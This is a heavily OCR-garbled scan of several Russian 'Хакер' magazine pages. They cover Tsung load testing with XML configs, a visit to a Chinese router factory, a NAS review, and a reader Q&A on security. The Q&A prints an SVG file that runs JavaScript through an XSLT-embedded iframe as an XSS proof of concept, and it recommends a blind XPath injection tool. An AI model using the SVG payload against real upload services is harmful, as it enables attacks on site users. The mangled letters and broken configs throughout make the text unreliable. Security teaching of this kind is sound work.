ТЕСТИРОВАНИЯ 




ітд 

• Егіапд — функ- 
циональный язык 
программирова- 
ния с динамиче- 
ской типизацией, 
предназначен- 
ный для создания 
распределенных 
вычислительных 
систем. 

• Егіапд был 
разработан Джо 
Армстронгом 

в 1986 году. 

• Тзипд является 
полностью от- 
крытым и бес- 
платным про- 
дуктом (лицензия 
6РІ_ѵ2). 

• Тзипд эффек- 
тивен для высо- 
конагруженных 
проектов. 

• Изначально 
Тзипд был пред- 
назначен для 
нагрузочного 
тестирования 
.ЛаЬЬег'а. 



ЛШЙ Н ПШР.ППМНШМ 




Отношение сгенерированных пользователей к подключенным 




В данном примере вторая машина используется в кластере 
Тзипд с большим «весом» и двумя ядрами. По умолчанию нагрузка 
равномерно распределена на все ядра (одно ядро на клиент по 
умолчанию). Параметр ѵѵеідЫ (іпіедег) может быть использован для 
настройки приоритетности машины клиента. В частности, если 
у одного клиента вес 1, а у другого 2, второй запустит в два раза 
больше юзеров, чем первый (пропорции будут 1/3 и 2/3). В при- 
веденном сценарии, где у второго клиента СРІІ = 2 и ѵѵеідЫ = 3, вес 
равен 1,5 для каждого ядра. 

Параметр тахизегз используется для того, чтобы обойти 
лимит на максимальное число зоскеі'ов, открываемых одним 
процессом (во многих ОС по умолчанию 1024). При превыше- 
нии лимита запускается новая виртуальная машина Егіапд'а. 
Значение тахизегз обычно равно 800, но сейчас можно и нужно 



Особо стоит отметить программы І_оасіРиппег, 
Рег^огтапсе Тезіег и ОАІ_оасі. Плюс их в том, что 
ты можешь попросить компанию-разработчика 
изменить или сконфигурировать систему под 
твои нужды, эти системы обычно универсальны 
и подходят для тестирования любого 
программного обеспечения. Но не каждая 
организация готова платить большие деньги, 
ктому же к исходникам нет доступа, что для 
многих является сдерживающим фактором. 



НАГРУЗКУ МОЖНО РАЗБИТЬ 
НА НЕСКОЛЬКО ФАЗ, НАПРИМЕР ПЛАВНО 
ЕЕ ПОВЫШАЯ. ВСЕ ПАРАМЕТРЫ ГИБКО 
НАСТРАИВАЮТСЯ 
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использовать гораздо большее значение (например, 30 000, лимит 
ОС поднимается командой иіітіі -п 30000), это не приведет к по- 
тере производительности. 

Естественно, что при нагрузочном тестировании нужно 
следить и за параметрами нагружаемой системы. Тзипд поддер- 
живает несколько типов мониторинга сервера. Это родной агент 
мониторинга Егіапд, всем известный Мипіп и БЫМР, агент должен 
быть установлен на стороне сервера. Если нагрузка создается на 
кластер серверов, можно применять разные агенты для разных 
серверов, например: 

<топі1:огіп§> 

<топі-бог Но 5'Е="1Ѳ.1.1.94" 1:уре="ег1ап§"/> 

<топгЬог ІіО5І:="10.1 .1 .95" 1:уре="типіп"> 
стипіп рог1:= ,, 8081 ,, /> 

</топі1:ог> 

<топі1:ог бо5І:="10.1.1.9б" 1:ѵре="5птр"> 

<зптр ѵег5Іоп="ѵ2" соттип^у^'пл/Соттип-ру" 
рог 1== ,, 11161 ,, /> 

</топі1:ог> 

</топі1;огіп§> 

Нагрузку можно разбить на несколько фаз, например плавно 
ее повышая. В настройках задаются длительность каждой фазы 
и очередность выполнения фаз. В каждой фазе можно установить 
количество конкурентных пользователей двумя способами: за- 
дать количество пользователей за промежуток времени, напри- 
мер 100 пользователей в секунду, либо указать, с какой частотой 
создавать пользователей, например один пользователь каждые 
0,01 секунды. Это можно использовать, например, для разогрева 
кешей перед большой нагрузкой. В стабильную нагрузку можно 
вставить специальную сессию в определенное время, для имита- 
ции какой-либо проверки или запуска специфического сервиса. 
Например: 

<1оасІ> 

каггіѵаірііазе рІіа5е="1" сІигаІііоп^'ІѲ" ипі1:="тіпи1:е">і 



<!-- Фаза разогрева --> 

<іі5ег5 іігЕегаггіѵа1="0.1" ипі1:="5есопсІ"> </и5ег5> 
</аггіѵаІрНа5е> 

<аггіѵа1рІіа5е р!іа5е="2" сІига1:іоп="бѲ" ипі1:="тіпи1:е"> 



АЛЬТЕРНАТИВА ОТ АРАСНЕ 



Арасбе ЭМеІег — отличный кросс платформенный инструмент, 
разрабатываемый Арасбе Эакагіа Рго]есІ. Изначально ЭМеІег 
создавался как средство тестирования веб-приложений, но 
в настоящее время он способен проводить нагрузочные тесты 
для ЮВС-соединений, РТР, ЮАР, БОАР, ЛИ5, РОРЗ, ІМАР, НТТР 
и ТСР. Архитектура, поддерживающая плагины сторонних 
разработчиков, позволяет дополнять инструмент новыми 
функциями. В программе реализованы механизмы авторизации 
виртуальных пользователей, поддерживаются пользовательские 
сеансы. Единственный, на мой взгляд, недостаток данного 
инструмента — создаваемые Эаѵа- потоки пожирают довольно 
много памяти, поэтому при большом количестве конкурентных 
запросов одной машины недостаточно. 



<!-- Фаза нагрузки --> 

<ц5ег5 аггіѵа1га1:е="1ѲѲ0" ипі1:="5есопсІ"> </и5ѳг5> 
</апгіѵа1рІіа5е> 



<!-- Специальные сессии --> 

<изег 5е55Іоп="асІсІМапуРгосІис1=5" 5І=аг1= 1=іше="20" 

ипі1:= ,, тпіпи1:е ,, /> 

<изег 5Ѳ55Іоп="сІіеск0гсІеп5" з1:ап1:_1:іте="25" 
ипі1:= ,, тіпи1:е ,, /> 

<У1оасІ> 

Кроме того, возможно настроить эмуляцию нескольких юзер- 
агентов и установить процентное соотношение между ними, этот 
процент определяет вероятность присвоения сессии юзера одного 
из указанных агентов. Далее более подробно остановимся на на- 
стройках НТТР-сессии. 

<5е55ІОП5> 

<5е55Іоп пате="Іі1:1:р-5е55Іоп" ргоЬаЬіИ1:у="70" 
1:уре="1:5_ ІтІ:1:р"> 

<гедие5І:> <ІтЕ~Ер иг1="/іта§е5/1о§о. §і-Р" 

те-^:I^осI= ,, СЕТ ,, ѵег5Іоп="1 . 1" і-Р тосіібесі 
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5УЫ/АСК 



зіпсе="Моп, 02 Ар г 2012 14:13:32 еМТ"/> 

</гедиез1:> 

<1:Іііпк1:іте ѵа1ие="20" гапс!от="1:гие"/> 

<~Егапзас1:іоп пате="іпсІех_гедие5І:"> 

<гедиез1:> <Іі1:1:р игі^/іпсіех. еп . ІтЬтІ" те1:КіосІ= "СЕТ " 
ѵеп5Іоп="1. 1" /> </гедиез1:> 

<гедиез1:> <Ы;1:р иг1="/1о§о.§і-р" те1:ІіосІ="СЕТ" 
ѵег5Іоп="1. 1" /> </гедиез1:> 

</1:пап5ас1іоп> 

<1:Рііпк1:іте тіп="1" тах="30" гапс!от="1:гие"/> 

</5Ѳ55ІОП> 

<5е55Іоп пате="Іі1:1:р-5е55Іоп2" ргоЬаЫН1:у="30" . . . > ... 
</5е55ІОП> 

</зе55ІОП5> 

В данной конфигурации две сессии, которые выполняют- 
ся с вероятностью 70% и 30% соответственно. В начале сессии 
генерируется ОЕТ-запрос с параметром М_тосІіПесІ_5Іпсе, далее 
идет рандомная задержка іЫпкІіте. По умолчанию іЫпкІіте будет 
случайное число из экспоненциального распределения со средним 
значением, равным ѵаіие. Но можно задать промежуток, тогда это 
будет случайное число из равномерного распределения на данном 
промежутке. Следующие два запроса объединены в транзакцию, 
это позволяет отслеживать суммарное время выполнения транзак- 
ции из нескольких запросов. 

Далее идет пример сессии для ЗаЬЬег'а. Так как ЗаЬЬег не парсит 
ответ, то у запроса есть несколько типов Аскпоѵѵіесідтепіз (подтверж- 
дений): ІосаІ — считается подтвержденным, если от сервера пришло 
подтверждение, по_аск — считается подтвержденным сразу после 
отправления, дІоЬаІ — используется для синхронизации действий 
пользователей, в основном для ожидания подключения всех поль- 
зователей перед отправкой сообщений (например, первого сообще- 
ния о присутствии). Также здесь показаны разные виды сообщений: 
аутентификация, присутствие, онлайн, офлайн. 
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ІѴ1Ѵ1ѴІ 

• Сайт проекта 
Тзипд: Ізипд.егіапд- 
ргоіесіз.ога: 

• графические 
интерфейсы для 
Тзипд:5іпд-Тзипд — 

доо.дІ/ѴУЫОбК. 

Тзипд ОШ — Ыиеепсі. 
сотАооІзАзипдиі . 




<5еззі оп5> 

<зеззіоп ргоЬаЫН1:у="100" пате="даЬЬег-ехатр1е" 
1=уре="1=5_даЬЬег"> 

<гедиез1:> сдаЬЬег Туре="соппес1:" аск="1оса1" /> 

</гедиез1:> 

<~Ыііпкѣіте ѵа1ие= ,, 2*'/> 

<Ігапзас± і о п п а те ="аи1:Ііеп1:іса1:е"> 

<гедиез1:> 

<даЬЬег 1:уре="аи1:1і_§е1:" аск="1оса1"/> 
</гедиез1:> 

<гедиез1:> 

сіаЬЬег •Ьуре= ,, аи~иі зеі: ріаіп" аск="1оса1"> 
</даЬЬег> 

</гедиез1:> 

</1:гап5ас1:іоп> 

<гедиез1:> 

<іаЬЬег 1:уре="рге5епсе:іпі1:іа1" аск="по аск"/> 
</гедиез1:> 

<1:гап5ас1:іоп пате="оп1іпе"> 

<гедиез1:> о'аЬЬег 1:уре="сІіа1:" аск="по аск" 

5І2е="16" сІез1:іпа1:іоп="оп1іпе" /> < /гедиез1:> 

</1:гап5ас1: іоп> 

<Тгапзас1:іоп пате="о-РПіпе"> 

<гедиез1:> <іаЬЬег Ііуре^'сііа-Е" аск="по аск" 

5І2е="5б" сІе5І:іпа1:іоп="о-РЯіпе"/> <гедиез1:> 
</1:гап5ас1:іоп> 

</зез5Іоп> 

</5е55ІОП5> 



КЛЮЧ НА СТАРТ 



Когда все подготовительные действия выполнены, можно запу- 
стить наш тест. Для этого необходимо ввести команду Ізипд зіагі, 



для останова соответственно Ізипд зіор, для просмотра статуса 
о количестве юзеров на сайте — Ізипд зіаіиз. Журнал событий по- 
мещается в каталог ~/.1зипд/1од/ууууттбб-НН:ММ. 

Для генерации НТМІ_-отчетов и диаграмм используется скрипт 
І5ипд_5ІаІ5.рІ, его необходимо запускать из директории с логом 
командой регі Ізипд_5ІаІ5.рІ. 

Статистика, которую предоставляет Тзипд: 

• производительность: время ответа, время присоединения, тран- 
закции, запросы в секунду; 

• ошибки: статистика по возвращенным ошибкам; 

• поведение сервера: график занятости СРІІ и памяти, сети. 



ЗАКЛЮЧЕНИЕ 



Тзипд можно использовать для проведения стресс-тестов разных 
проектов и новых площадок, но лучше всего он подойдет для 
тестирования высоконагруженных систем. К нему можно прибег- 
нуть для определения стрессоустойчивости разного вида клиент- 
серверных приложений, 501-базы или джаббера. Ну и нам хватит 
всего одной машины, чтобы имитировать достаточно большую 
нагрузку. ІНІ 



Т51Ж6 С ПОЛНЫМ ПРАВОМ 
МОЖНО ПРИЧИСЛИТЬ к одним 
ИЗ ЛУЧШИХ РЕШЕНИЙ ДЛЯ 
НАГРУЗОЧНОГО ТЕСТИРОВАНИЯ 
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ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



ДХт Мы аілем.гд^орлірсі-іоиіііспмы^лѵішчі? продукту. 
Шш Вы знаете, что жжете кгійти юс рядом. под маркой ТАЗН 



Реклама 



ГЕМШМ 



Александр Лозовский 



ВЕЛИКОЕ 

КИТАЙСКОЕ 

ПРОИЗВОДСТВО 




КУЛЬТУРНЫЕ ИССЛЕДОВАНИЯ 
БРАТСКОГО КИТАЯ В ПОЛЬЗУ 
ИЗВЕСТНОГО ЖУРНАЛА «ХАКЕР» 



ш 



эньчжэнь, несмотря на то что о нем мало кто слышал, 
относится к одним из самых промышленно и экономи- 
чески развитых городов Поднебесной (второе место 
среди китайских городов по объему промышленного производ- 
ства). Причиной тому было образование в его районе свободной 
экономической зоны, что привлекло в город инвестиции, крупные 
компании (в том числе иностранные) и большое количество тру- 
довых мигрантов. 

Из компаний, название которых тебе может хоть что-то сказать 
и гигантские небоскребы которых мы имели честь видеть во 
время прогулок по городу, я бы назвал три: Ниаѵѵеі, 2ТЕ, ТР-иі\ІК. 
В представлении эти конторы не нуждаются — мало кто не знает 
«телефоны с неприличными названиями», «русские националь- 
ные убийцы айфонов» и не очень известный, но набирающий по- 
пулярность в наших пенатах производитель роутеров. Собствен- 
но, последний и пригласил нас в это путешествие. Да, эти люди 
знали, что нам страсть как хотелось посмотреть на настоящее 
производство. Проживая в России, мы подозревали, что наклеи- 
вание шильдиков на готовые приборы и крупноузловая сборка 
импортной аппаратуры к настоящему производству не относит- 
ся, поэтому мы мечтали взглянуть на то, как печатаются платы, 
впаиваются электронные компоненты, привинчиваются антенны 
и собираются корпуса. И все это было нам продемонстрировано. 

Впрочем, некоторые откровения нас постигли еще до того, 
как наши автобусы въехали на территорию фабрики. Во-первых, 
мы увидели фабричные общежития. Как цивилизованный моск- 
вич, прошедший в свое время достойную закалку в Россий- 
ском университете дружбы народов, я немножко не по-другому 
представлял себе типичное общежитие... Точнее, я представлял 
его как угодно, но только не как чистое многоэтажное здание 



Страна, которая занимает лидирующие места по ко- 
личеству произведенной малвари. Здесь всегда 
можно найти абузоустойчивый хостинг, и здесь жи- 
вет куча программеров и хакеров — от откровенно 
слабых до профессионалов высокого уровня. Здесь 
ломают программы, ставят (не только софтверные) 
закладки и отсюда устраивают ООоЗ'ы. Для настоя- 
щего айтишника здесь созданы все условия — на- 
пример, фейсбук и твиттер отсечены великим нацио- 
нальным файрволом, что не может не сказываться 
на производительности труда компьютерщиков. 
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Великое китайское производство 




ИНТЕРЕСНЫЕ ФАКТЫ 



В Китае очень любят ѴѴіпсіоѵѵз ХР, боодіе 
СИготе и МоііІІа. ѴѴіп7 я нигде не видел — 
ни на производстве, ни в ресторанах. 

Количество настоящих іРНопе 45, Саіаху 53 
и топовых НТС у пассажиров метро в Гонконге 
поражает воображение. Левые китайские (хе- 
хе) смартфоны встречаются очень редко... 

Водят в Китае резче, чем в Европе, но чуть 
спокойнее, чем у нас. Разумеется, в три ряда 
не паркуются и с четырех рядов не поворачи- 
вают. 

В Китае есть полицейские велосипеды. Обычно 
они просто стоят на тротуаре и мигают пробле- 
сковыми маячками, свидетельствуя о том, что 
качественные аккумуляторы в Китае имеются. 

Метро города Гонконга удивительно простор- 
ное, снабжено весьма подробными картами, 
а все остановки там объявляются на англий- 
ском. В общем, если тебе захочется сравнить 
метро Гонконга с метрополитеном им. В. И. Ле- 
нина, то последний может быть объявлен побе- 
дителем исключительно в категории «Культур- 
ное наследие». 

Угнетенные граждане КНР нам тоже встреча- 
лись — вечерами они съезжаются на грузовых 
велосипедах (ничего смешного, кстати) на 
стихийные рынки, достают пропановые балло- 
ны и гигантские казаны и начинаютторговать 
едой и всякой мелочевкой. 



с кондиционерами у каждого окна и по линеечке развешанным 
на окнах бельем. Возможно, конечно, что эту самую одежду так 
повесили по команде перед прибытием иностранной делегации, 
но контраст между отечественными и китайскими общагами 
был впечатляющ. Впрочем, хватит об общагах — в конце концов, 
внутрь мы все равно не заходили. А вот внутрь завода — через 
подъезд, украшенный кумачовым знаменем с надписью «Добро 
пожаловать на фабрику ТР-ІЛМК», — мы действительно проник- 
ли. Как следует прозомбировавшись презентацией, которая рас- 
сказала нам о планах, достижениях и перспективах компании, мы 
отправились туда, где таилось все самое интересное, — на завод. 

Завод оказался на редкость чистым и опрятным. В принципе, 
это совершенно логично, что электронный завод должен быть 
чистым, — просто сознание человека, который привык к зданиям 
1960-х годов постройки, выбитым заводским окнам и сдающимся 
под офисы помещениям, должно было адаптироваться к этой 
новой реальности. Разумеется, бетонных заборов с пущенной 
поверху оцинкованной колючей лентой «Егоза» мы тоже не 
обнаружили. 

Первым делом мы увидели склад. Склад был совершенно 
обычным — антистатические покрытия, идеально ровно рас- 
положенные стеллажи, пронумерованные и тщательно учтенные 
запасные части. Принимая во внимание строгость китайского 
законодательства и наше уважение к гостеприимным хозяевам, 
никто из нашей экспедиции на складе ничего не спер. 



Рынки левого товара в Китае тоже есть, но на 
фоне вполне официальных моллов найти их 
не так просто. Зато там можно купить телефон 
с надписью «2оро» на борту и характеристи- 
ками, близкими кфлагманским смартфонам 
современности. Меньше чем за 200 баксов. 

Когда в одном ресторанчике я обнаружил 
оторванную и прислоненную к стене дверь и от- 
сутствие мыла на раковине, я испытал острый 
приступ ностальгии. 



ПРОВЕРЯЕТСЯ ГОТОВАЯ 
ПРОДУКЦИЯ ДОВОЛЬНО СУРОВО — 
КАЖДЫЙ РОУТЕР ПОДКЛЮЧАЮТ 
К ТЕСТИРУЮЩЕЙ АППАРАТУРЕ 
И ЗАСОВЫВАЮТ В КАМЕРУ, КОТОРАЯ 
ОПРЕДЕЛЯЕТ ЭМ-ИЗЛУЧЕНИЕ 
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мы там увидели. Вот, к примеру, отдел, в котором за- 
нимаются сломавшимися или не прошедшими проверку 
роутерами. Казалось бы, парни и девушки, прикованные 
к своим рабочим местам заземленными браслетами, просто 
обязаны иметь кучу кустарных приспособлений. Припой 
в консервной банке, ну хотя бы держатель для паяльника 
из сталистой проволоки! Но нет. Все приборы и материа- 
лы — штатные и очень приличные. Оставив надежду найти 
здесь признаки русской народной электротехники, мы 
направились в отдел, где испытывают производимую тех- 
нику. Отличная мысль — проверка в сухожаровом шкафу. 
Роутеры, засунутые в сухожаровой шкаф с выставленной 
температурой 60 градусов, рождают ассоциацию с Швар- 
ценеггером из «Красной жары». Который включает роутер 
в розетку и говорит: «Если ты работал на литейном, то при- 
вык к жаре!» 

Все остальные проверочные стенды не столь эпичны. 
Куча звукоизолированных помещений и прочих клеток 
Фарадея, стенды с большим количеством оборудования, 
которое проверяется на совместимость с производимым, 
проверка на работу во влажных условиях и хитрый прибор, 
симулирующий статическое электричество... Наверное, 
хорошая штука — проверенный ей роутер выдержит любую 
грозу. Зато выгорит подключенная к нему сетевуха ;). 

Воттак, шагза шагом и комната за комнатой, закон- 
чилась наша экскурсия по фабрике ТР-1_ІІ\ІК. Впереди нас 
ждали обычные экскурсии, обеды, ужины (порой даже 
с русской водкой) и прочие мероприятия, намекающие нам, 
что восточное гостеприимство — не пустой звук. Впрочем, 
все это быстро закончилось... 

Сквозь стену тропического ливня (который отличается 
от обычного тем, что за несколько секунд в нем ты вымо- 
каешь до нитки) корпоративный транспорт доставил нас 
на родину Брюса Ли и Джеки Чана — Гонконг, откуда само- 
лет компании унес нас в страну вечнозеленых помидоров, 
вечнотемных подъездов и вечнотекущих кранов. Где за 
полчаса поездки в аэроэкспрессе до Павелецкого вокзала 
мы в полной мере компенсировали тот визуальный дефицит 
бетонных заборов с колючей проволокой, бардака, распада 
и граффити, который все эти дни подспудно в нас накапли- 
вался. =Н= 



Затем мы перешли в цех, где собирают вай-фай-роутеры. 
Огромное помещение. Таблицы и схемы, показывающие 
запутанные отношения в вертикали заводской власти 
и особенности техпроцесса. И наконец, конвейер. Здесь 
весьма приличного вида рабочие (вовсе, кстати, не похожие 
на угнетенных китайских добровольцев) претворяют в жизнь 
электротехническую мысль. Японские станки, которые 
наносят электропроводящие цепи. Не первой свежести, 
но вполне еще бодрые. Лента конвейера несет готовые 
платы к установщикам электронных компонентов, передает 
их в аппарат для пайки, в объятия тетенек, которые отку- 
сывают выступающие ножки и допаиваютто, с чем не спра- 
вилась аппаратура, затем к прикручивальщикам антенн, 
установщикам в корпуса (дяденька, тремя четкими ударами 
обрезиненного молотка собирающий корпус, быстро стал 
народным любимцем) и, наконец, в руки сотрудников ОТК. 
Проверяется готовая продукция довольно сурово — каждый 
роутер подключают ктестирующей аппаратуре и засовыва- 
ют в камеру, которая определяет ЭМ-излучение. 

Впрочем, не одним конвейером живо производство. 
Помимо завода, мы побывали в основном здании ком- 
пании, где кипит мысль разработчиков — инженеров 
и программистов. В большинстве служебных помещений 
фотографировать было нельзя, но кое-что интересненькое 
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ТЕВА5ТАТІ0Ы 

Т554000 

ЫАЗ'Ы В МАССЫ 



У 



стройства ЫА5 уже давно перестали быть чем-то 
необычным, сложным и далеким и для домашнего 
использования, и для применения в небольшом 
офисе. В наш век, когда сетевые технологии развиваются 
бурными темпами, любой уважающий себя пользова- 
тель просто обязан иметь сетевой накопитель. На рынке 
присутствует множество моделей портативных серверов 
с различным «железом» и прошивками. Сегодня же речь 
пойдет о производительном решении, предназначенном 
для 50Н0-сегмента, — ВиІТаІо ТегаВіаІіоп Т5540СЮ. 

ВиІТаІо ТегаЗіаІіоп Т5540СЮ имеет внешний экран, 
поэтому пользователю не придется каждый раз об- 
ращаться к «админке» в поисках той или иной мелочи. 

На задней стенке ВиІТаІо ТегаЗіаІіоп Т5540СЮ распаяно 
сразу четыре ІІ5В-разъема, два из которых прогрессив- 
ного, третьего поколения. Рядом с ними расположились 
два гигабитных порта ЕіЬегпеІ и порт для управления 
источником бесперебойного питания. В целом внешний 
вид сетевого накопителя не имеет каких-либо недочетов. 
І\ІА5 для офисного сегмента выглядит строго и лаконич- 
но. Интерфейс управления прост и понятен. 

Сердцем обновленной линейки ВиІТаІо ТегаЗіаІіоп 
Т5540СЮ является двухъядерный процессор Іпіеі Аіот 
02550. Чип функционирует на частоте 1,86 ГГц, имеет два 
физических ядра, 1 Мб кеша и поддерживает технологию 
Нурег-ТЬгеасІіпд. Да, как показало время, процессоры, 
первоначально разработанные для неттопов и нетбуков, 
отлично зарекомендовали себя и в готовых І\ІА5. Ведь 
помимо всех перечисленных характеристик I піеі Аіот 
02550 имеет теплопакет всего 10 Вт. Процессор вместе 
с 2 Гб оперативной памяти стандарта ООРЗ создает весь- 
ма и весьма производительный тандем. Мощности такого 
железа хватит на несколько лет постоянного использо- 
вания и смену не одного поколения прошивок. 

ВиГГаІо ТегаЗіаІіоп Т554000 может поставляться 
с комплектом жестких дисков емкостью от 1 до 4 Тб. Это 
первое хранилище компании, где применяются диски 
такого большого объема. Имея в распоряжении четыре 
ГЮО, мы можем организовать массив РАЮ уровня 0, 1, 

5, 6 и 10, а также получить непосредственный доступ 
к накопителям в режиме ЭВСЮ. ВиГГаІо ТегаВіаІіоп 5400 
поддерживает горячую замену дисков, что не может 
не радовать, особенно в условиях постоянного файло- 
оборота в офисе. Поддержка І5С5І также говорит нам 
о бизнес-направленности устройства. С помощью ВиІТаІо 




кШ 


ш 




ш 



Компоновка (каждый диск 
в отдельности): 1 Тб, 2 Тб, 

3 Тб, 4 Тб 

Максимальный объем: до 

16 Тб 

Процессор: Іпіеі Аіот Ц2550 

Оперативная память: 2 Гб, 

ЦОРЗ 

Слоты для НЮй: 

4 РАЮ: 0/1/5/ /6/1 0 
Разъемы: 2 х Р-І-45 
10/100/1000 Мбит/с, 2 ХІІ5В 
2.0, 2 х 115В 3.0 

Сетевые протоколы: ТСР/ 

ІР, ЦНСР, СІР5/5МВ, АРР, 

ИР5, НТТР, НТТР5, РТР, ІМТР, 
ЗитЬо-кадры 

Сервисы: Атагоп 53, Ассезз 
І_іпк, ІМоѵаВАСКІІР, Ц|_МА 
Месііа Бегѵег, ВіГГоггепІ, 
принт-сервер, сервер 
видеонаблюдения, Арріе Тіте 
МасЫпе 

Поддержка І5С5І: есть 
Размеры: 231 х 170 х 216 мм 
Масса: 8 кг 



ТегаЗіаІіоп Т5540СЮ можно организовать сервер видео- 
наблюдения. В комплекте идетлицензия на одну камеру, 
а также заявлена поддержка более 1200 моделей камер 
от 184 производителей. Конечно же, ВиІТаІо ТегаЗіаІіоп 
Т554000 имеет поддержку принт-сервера. 

Отметим, что конструкция накопителя предполагает 
внутреннее размещение блока питания. На наш взгляд, 
это более разумное решение, нежели использование 
внешнего адаптера питания. Во-первых, мы избавля- 
емся от большого провода. Во-вторых, блок питания 
получает активное охлаждение. Производитель даже 
не побоялся дать на устройство три года гарантии. 



вывод 



Помимо «железной» составляющей, не вызывающей на- 
реканий, стоит отдать должное и программистам, трудя- 
щимся над прошивкой ВіЮаІо ТегаЗіаІіоп Т5540СЮ. Хотя 
бы за то, что все учтено до мелочей. Также программное 
обеспечение позволяет использовать накопитель как 
душе угодно. Именно поэтому ВиІТаІо ТегаВіаІіоп 5400 
нельзя однозначно отнести к определенному классу: 
сервер будет хорош как дома, так и в офисе. ПС 
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Глеб Чербов (сИегЬоНйдтаіІ.сот) 
Евгений Неёлов (іѵѵіиег.сот/пеуоіоѵ] 




ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аКЕАІ..ХАКЕР.ІШ 



Подскажите — как можно упростить экс- 
плуатацию уязвимости типа ВХІ? 

Напомню, что уязвимость ВІіпсІ ХРаіЬ 
іпіесііоп заключается в возможности 
внесения изменений в ХРаіЬ-запрос к ХМІ_ базе 
данных, выполняемый на стороне сервера. 
Практически сестра-близнец всем известной 
5СП_-инъекции, только с использованием не 
5(ЗІ_, а языка ХРаіЬ. В случае слепой инъекции 
мы можем формировать исполняемые запросы 
и довольствоваться лишь информацией об 
успехе выполнения. Немного, но достаточно, 
чтобы байт за байтом перебрать на серверной 
стороне содержимое ХМЬхранилища. Делать 
это вручную, разумеется, занятие неблагодар- 
ное. Особенно когда под рукой есть отличная 
утилита для эксплуатации ВХІ — ХРаіЬ ВІіпсІ 
Ехріогег ( Ьіі.Іу/ВХІЕхрІогег ). Не перегруженный 
опциями интерфейс позволяет очень гибко 
настроить программу. Помимо обычной работы 
посредством генерации 6ЕТ или Р05Т, 
программа дает возможность добавлять 
к запросам пользовательские заголовки, что 
значительно расширяет границы применения 
тулзы. Все, что потребуется задать, кроме ІІРІ_ 
уязвимого скрипта и опционального прокси, — 
это значение, которое содержится в получае- 
мом ответе и сигнализирует об успешном или 
нет выполнении запроса. Остается нажать 
кнопку «6ЕТ ХМІ_» и наблюдать, как символ за 
символом тайное становится явным. 



Есть сервис, позволяющий загрузку 
пользовательских изображений, в том 
числе и 5Ѵ6. Как это можно использовать для 
атаки на пользователей? 

Цифровые изображения вообще опасная 
штука! :-) Рассмотрим пример проведения 
банальной Х55 при помощи специально 
сформированной 5ѴС-картинки. И попутно 
окунемся в воспоминания о нетакихуж 
и далеких, но, к всеобщему счастью, уже 
отошедших к истории временах, когда 
популярные браузеры грешили игнорированием 
МІМЕ-типов, получаемых от сервера. Для начала 
вспомним, что 5ѴС представляет собой не что 
иное, какХМІ_-представление, интерпретируе- 
мое впоследствии рендером. На самом деле 
можно было бы просто включить в описание 
скрипт (спецификация настут ничем не 
ограничивает), но мы используем технику 
хамелеонного поведения при помощи Х5І_- 
трансформации. Так, наша вредоносная 
нагрузка будет выполнена лишь в случае 
прямого обращения браузера к файлу, например 
посредством <іТпате>. При попытке же 
отобразить его с помощью тега <ітд> пользова- 
тель получит безобидное изображение. 

<?хт1 ѵег5Іоп="1.Ѳ"?> 

< ! йОСТУРЕ сіос [ 

< ! АТТИ5Т Х5І:5І=у1е 5Ііее1: 
ісі ІР #КЕОІЯКЕР>]> 



<зѵ§ хт1п5="Іі1:1:р : //ыыы.ыЗ . оп§/2ѲѲ0/5ѵ§">і 
^<хб 1: 5І:у1е5Ізее1: ісІ= " зІіуІезИееІ: " 
ѵег5Іоп="1.0" \ 

хтІПБ : Х5І=" Ыііір: //ымм.м3.ог)Е[/1999/Х5і-/ 
Тгап5Тогт"> 

<Х5І:1:етр1а1:е та1:сІі="/"> 

<іТгате хт1п5="1і1:1:р: //ыыы.ыЗ .ог§/1999/ 
хЫ=т1" \ 

5гс="даѵа5сгір1; :а1ег1;(1) " ></і-Рпате> 

</х5 І:1:етр1а1:е> 

</х5 1 : 5І=ѵ1е5Ііее1= > 

<сіпс!е б11="гесІ" г="40"х/сігс1е> 
<Узѵ§> 

Имеется некий файл, используемый для 
хранения данных приложения. 

В Нех-редакторе признаков строковых 
значений и других зацепок нет. Можно ли 
как-то узнать, является это просто бинарным 
представлением каких-то структур или было 
использовано шифрование? 

Действительно, разобраться в закрытом 
формате хранилища или дампе — задача 
не из простых. Особенно если нет даже 
предположений, в каком направлении копать 
и стоит ли копать вообще. Ведь если было 
использовано шифрование, то шансов 
обнаружить в итоге искомые данные при таком 
подходе не остается вовсе. На помощь в этой 
ситуации приходит простой инструмент из 
сложного математического аппарата — инфор- 









РАСПОЗНАЕМ КРИПТОАЛГОРИТМЫ ПРИ АНАЛИЗЕ ИСПОЛНЯЕМОГО ФАЙЛА 



Большинство криптографических функций, 
используемых в ПО, действительно детекти- 
руемы при помощи статического анализа, 
причем зачастую не требуется ничего 
хитрее поиска по сигнатурам. Сегодня речь 
пойдет о нескольких схожих по функциона- 
лу инструментах, в силу понятных причин 
имеющих свои уникальные сильные сторо- 
ны. Так что нелишним будет иметь в своем 
арсенале реверсинг-софта сразу несколько 
подобных утилит. 



РіпсІСгурІ 

Плагин для не нуждающегося в осо- 
бом представлении дизассемблера- 
комбайна ЮА Рго от его же создателя. 

В отличие от самого дизассемблера свободно 
распространяется вместе с исходным кодом, 
что дает возможность при необходимости до- 
полнить функционал в соответствии с кон- 
кретной задачей. Обладает внушительным 
набором сигнатур и высокой скоростью рабо- 
ты. Иными словами — тизіЬаѵе-дополнение 
к ЮА. 



Іттипііу йеЬиддег зеагсіісгурі 

Расширение, входящее в стандартный 
набор, написанное на РуіЬоп и мо- 
ментально доступное из командной строки 
отладчика. Для вызова достаточно набрать 
«ІвеагсЬсгурІ», после чего будет произведено 
сканирование открытого в отладчике файла. 
Ход выполнения и результаты, включающие 
названия обнаруженных алгоритмов и адреса 
в памяти, выводятся в общий лог, доступ- 
ный в отдельном окне. По функционалу схож 
с РіпбСгурЦ но проигрывает в скорости. 
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Вопросы и ответы 



БОЛЬШОЙ ВОПРОС 



мационная энтропия. Именно эта волшебная 
функция поможет навскидку отделить данные 
с намеком на структурность от криптоконтей- 
нера. Не вдаваясь в подробности, энтропия — 
это величина, характеризующая неопределен- 
ность информации, то есть теоретически 
наибольшее значение энтропии должен иметь 
белый шум или вывод /беѵ/игапсіот. 
Современные шифры и алгоритмы сжатия 
также в большинстве своем выдают данные 
с высоким значением энтропии. Вычислять на 
бумажке, конечно, ничего не придется, 
получить искомую цифирь для файла можно 
утилитой, носящей скромное имя епі 
( Ьіі.Іу/епіНгору ). 

Как, зная параметры криптосистемы 
К5А, проще всего расшифровать 
сообщение? 

Для того чтобы расшифровать Р5А- 
сообщение, достаточно знать так 
называемые модуль (І\І) и закрытую экспоненту 
